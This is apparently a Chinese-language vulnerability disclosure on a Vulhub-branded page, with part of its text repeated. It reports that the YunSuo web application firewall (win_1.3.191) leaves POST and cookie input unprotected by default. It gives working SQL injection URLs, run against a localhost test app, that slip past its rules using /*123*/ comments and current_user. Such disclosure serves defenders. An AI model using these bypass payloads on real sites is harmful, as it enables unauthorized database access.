VULHUB ™

### 简要描述： 绕了几周终于绕过去了，真的不容易，求首页 执着是一种态度~ ### 详细说明： 测试的是windows下的win_1.3.191最新版 存在两个问题： 1.默认配置对POST和cookie没防护，有防护的功能默认勾上呗 [<img src="https://images.seebug.org/upload/201503/221526272b1c2aece20b6b431de64be51d694796.jpg" alt="y.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/221526272b1c2aece20b6b431de64be51d694796.jpg) 2.防护规则可被/*123*/这种形式绕过 ### 漏洞证明： 还是配置一个注入环境： 1.先试下/**/发现被云锁拦截了： ``` http://localhost/74/wap/wap-company-show.php?id=8E0union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43# ``` [<img src="https://images.seebug.org/upload/201503/22152947bc23b6813011590dbe5a7ff5b01497b0.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/22152947bc23b6813011590dbe5a7ff5b01497b0.jpg) 2.使用/**/成功得到很多字段： ```...

### 简要描述： 绕了几周终于绕过去了，真的不容易，求首页 执着是一种态度~ ### 详细说明： 测试的是windows下的win_1.3.191最新版 存在两个问题： 1.默认配置对POST和cookie没防护，有防护的功能默认勾上呗 [<img src="https://images.seebug.org/upload/201503/221526272b1c2aece20b6b431de64be51d694796.jpg" alt="y.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/221526272b1c2aece20b6b431de64be51d694796.jpg) 2.防护规则可被/*123*/这种形式绕过 ### 漏洞证明： 还是配置一个注入环境： 1.先试下/**/发现被云锁拦截了： ``` http://localhost/74/wap/wap-company-show.php?id=8E0union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43# ``` [<img src="https://images.seebug.org/upload/201503/22152947bc23b6813011590dbe5a7ff5b01497b0.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/22152947bc23b6813011590dbe5a7ff5b01497b0.jpg) 2.使用/**/成功得到很多字段： ``` http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43# ``` [<img src="https://images.seebug.org/upload/201503/221528336bd498d8ce296273e5ea6deeba52d3e5.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/221528336bd498d8ce296273e5ea6deeba52d3e5.jpg) 3.问题又来了，发现云锁对数据库查询防护很严格 ``` http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,user%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43# ``` [<img src="https://images.seebug.org/upload/201503/221531374299d7a0bfbd3d57da283edd8ba82eee.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/221531374299d7a0bfbd3d57da283edd8ba82eee.jpg) 4.经过几周的学习，发现current_user这个方式又可以绕过了！ ``` http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43# ``` [<img src="https://images.seebug.org/upload/201503/2215330881a0dae42e1d7c601c74e058d483e8b2.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2215330881a0dae42e1d7c601c74e058d483e8b2.jpg) 执着是一种态度~